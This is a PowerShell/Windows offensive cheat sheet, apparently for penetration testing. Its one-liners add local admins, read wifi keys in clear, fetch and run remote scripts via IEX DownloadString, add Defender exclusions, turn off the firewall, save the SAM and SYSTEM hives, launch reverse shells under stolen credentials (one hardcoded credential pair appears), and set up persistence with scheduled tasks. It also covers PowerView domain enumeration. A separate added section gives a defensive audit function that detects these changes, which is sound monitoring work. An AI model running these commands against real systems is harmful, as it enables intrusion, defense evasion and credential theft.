Powershell

Create an admin user

Create the user and add it to the Administrator group

net user ${username} ${password} /add
net localgroup Administrators ${username} /add

Run as domain user

Run a powershell as a domain user

runas /netonly /user:DOMAIN\USER "powershell.exe -Exec Bypass"
  • /netonly: the process runs locally as the current user, but network connections are performed with the domain user's credentials

Copy a full directory

Copy a full directory and its subdirectories

xcopy.exe /s source_absolute_path dest_absolute_path

Check hives rights

Use Sysinternals binary accesschk.exe to check the hive ACL

accesschk.exe /accepteula -qusk "Users" HKLM\SOFTWARE\....

Display wifi passwords

Display a wifi password knowing its SSID

netsh wlan show profiles
netsh wlan show profile name="NETWORK" key=clear | Select-String 'Key Content'

Download file

Invoke-WebRequest -Uri ${url} -OutFile ${outFile}

Run as another user

Run an executable as another user. Useful to launch a reverse shell with another user's privileges.

# Option 1: start the process directly with the other user's credentials
$secpasswd = ConvertTo-SecureString ${password} -AsPlainText -Force
$mycreds = New-Object System.Management.Automation.PSCredential (${username}, $secpasswd)
$computer = "${hostname}"
[System.Diagnostics.Process]::Start(${reverseShellPath}, "", $mycreds.UserName, $mycreds.Password, $computer)

# Option 2: build the credential char by char and run a script block with Invoke-Command
$username = "BART\Administrator"
$password = "3130438f31186fbaf962f407711faddb"
$secstr = New-Object -TypeName System.Security.SecureString
$password.ToCharArray() | ForEach-Object { $secstr.AppendChar($_) }
$cred = New-Object -TypeName System.Management.Automation.PSCredential -ArgumentList $username, $secstr

Invoke-Command -ScriptBlock { XXXXXX } -Credential $cred -ComputerName localhost

Use system proxy

Use the configured system proxy to perform requests

(New-Object System.Net.WebClient).Proxy.Credentials=[System.Net.CredentialCache]::DefaultNetworkCredentials
[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12

IEX downloadstring

Download a remote PowerShell script and execute it from memory

powershell.exe -exec Bypass -noexit -C "IEX (New-Object Net.WebClient).DownloadString('${URI}/file.ps1')"

Set environment variable

Set the value of an environment variable.

Set-Content -Path Env:${EnvVar} -Value ${NewValue}

Add exclusion folder to WinDefender

Add a no-scan directory to WinDefender

Set-MpPreference -ExclusionPath "C:\Temp"

Disable firewall

Fully disable the firewall

netsh advfirewall set allprofiles state off

Dump SAM

Save the SAM and the System hive

reg save HKLM\SAM ./SAM.save
reg save HKLM\System ./System.save

Activate RDP

Enable and authorize RDP connections

# Allow RDP connections
Set-ItemProperty 'HKLM:\SYSTEM\CurrentControlSet\Control\Terminal Server\' -Name "fDenyTSConnections" -Value 0

# Require network pre-authentication (NLA) for RDP sessions
Set-ItemProperty 'HKLM:\SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp\' -Name "UserAuthentication" -Value 1

# Allow RDP traffic through the firewall
Enable-NetFirewallRule -DisplayGroup "Remote Desktop"

List RDP connection on a machine

List the users having an RDP connection on the targeted machine

$DSC = (New-Object System.Management.Automation.PSCredential("${domain}\${user}", (ConvertTo-SecureString "${password}" -AsPlainText -Force)))
Invoke-Command -ScriptBlock { qwinsta } -ComputerName ${ip} -Credential $DSC

Kill process by name

Kill all processes with a given name

taskkill /IM ${processName} /F

Scheduled task

# Define the task
# Change /sc and /mo to match the schedule you need
schtasks /create /sc hourly /mo 1 /tn "${taskname}" /tr "${command}"

# Force the task execution
schtasks /run /tn "${taskname}"
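The sections "Create an admin user", "Add exclusion folder to WinDefender", "Disable firewall", "Activate RDP" and "Scheduled task" each change host state that a defender can read back. The audit function below is an added example, not part of the original cheat sheet; it assumes Windows PowerShell 5.1+ with the Defender, NetSecurity and ScheduledTasks modules present, and reports the exact settings those sections modify. The "suspicious path" regex for task actions is an assumed heuristic, not a rule from the page.

```powershell
# Added example: report the host changes documented in the sections above.
# Run from an elevated prompt; assumes Windows PowerShell 5.1 or later.
function Get-HostTamperingReport {
    $findings = New-Object System.Collections.Generic.List[object]
    $add = { param($check, $detail)
        $findings.Add([pscustomobject]@{ Check = $check; Detail = $detail }) }

    # 1. Local Administrators membership (net localgroup Administrators ... /add)
    Get-LocalGroupMember -Group 'Administrators' |
        ForEach-Object { & $add 'LocalAdmin' $_.Name }

    # 2. Defender path exclusions (Set-MpPreference -ExclusionPath)
    foreach ($p in @((Get-MpPreference).ExclusionPath)) {
        if ($p) { & $add 'DefenderExclusion' $p }
    }

    # 3. Firewall profiles switched off (netsh advfirewall set allprofiles state off)
    Get-NetFirewallProfile | Where-Object { $_.Enabled -eq 'False' } |
        ForEach-Object { & $add 'FirewallProfileOff' $_.Name }

    # 4. RDP enabled through fDenyTSConnections = 0
    $ts = Get-ItemProperty 'HKLM:\SYSTEM\CurrentControlSet\Control\Terminal Server' `
            -Name fDenyTSConnections
    if ($ts.fDenyTSConnections -eq 0) { & $add 'RdpEnabled' 'fDenyTSConnections=0' }

    # 5. Scheduled tasks whose action runs from a user-writable location
    #    (assumed heuristic: paths under Users, Temp or ProgramData)
    foreach ($task in Get-ScheduledTask) {
        foreach ($a in $task.Actions) {
            if ($a.Execute -match '\\Users\\|\\Temp\\|\\ProgramData\\') {
                & $add 'SuspiciousTask' "$($task.TaskPath)$($task.TaskName): $($a.Execute) $($a.Arguments)"
            }
        }
    }
    return $findings
}

Get-HostTamperingReport | Format-Table -AutoSize
```

Run it once on a known-good build to capture a baseline, then diff later runs against it; every row that is new since the baseline is worth a look.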

Domain Information

Get password policy

Get-DomainPolicyData | select -ExpandProperty SystemAccess

Get domain user information

Get-DomainUser -Identity nlamb

Get computer information

Get-DomainComputer -Properties DnsHostName | sort -Property DnsHostName

# Enumerate the machines on which a given domain user or group is a member of a given local group (via GPO)
Get-DomainGPOUserLocalGroupMapping -LocalGroup Administrators | select ObjectName, GPODisplayName, ContainerName, ComputerName

Get Organization Unit

Get-DomainOU -Properties Name | sort -Property Name

Get group information

Get-DomainGroup | where Name -like "*Admins*" | select SamAccountName
Get-DomainGroupMember -Identity "Domain Admins" | select MemberDistinguishedName

Get GPO

Get-DomainGPO -Properties DisplayName | sort -Property DisplayName
Get-DomainGPO -ComputerIdentity ${ComputerName} -Properties DisplayName | sort -Property DisplayName

# GPO modifying local group membership
Get-DomainGPOLocalGroup | select GPODisplayName, GroupName

Get Session information

Get information about the sessions open on the local (or a remote) machine. CName is the source of the connection.

Get-NetSession -ComputerName ${computerName} | select CName, UserName

Proxy Aware

$w=(New-Object Net.WebClient);$w.Proxy.Credentials=[Net.CredentialCache]::DefaultNetworkCredentials;IEX $w.DownloadString("<url>")

Import and Export Powershell objects

Get-ADComputer -Filter * | Export-Clixml C:\Users\Administrator\computers.xml
$computers = Import-Clixml C:\Users\Administrator\computers.xml
$computers | ? { $_.DistinguishedName -match "cicd" }
$computers | ? { $_.DistinguishedName -eq "XXXXXX" }

Sites and subnet

Get-ADObject -searchbase "cn=Configuration,dc=${},dc=${}" -ldapfilter "(objectClass=subnet)" -Server ${dcIp} -properties *
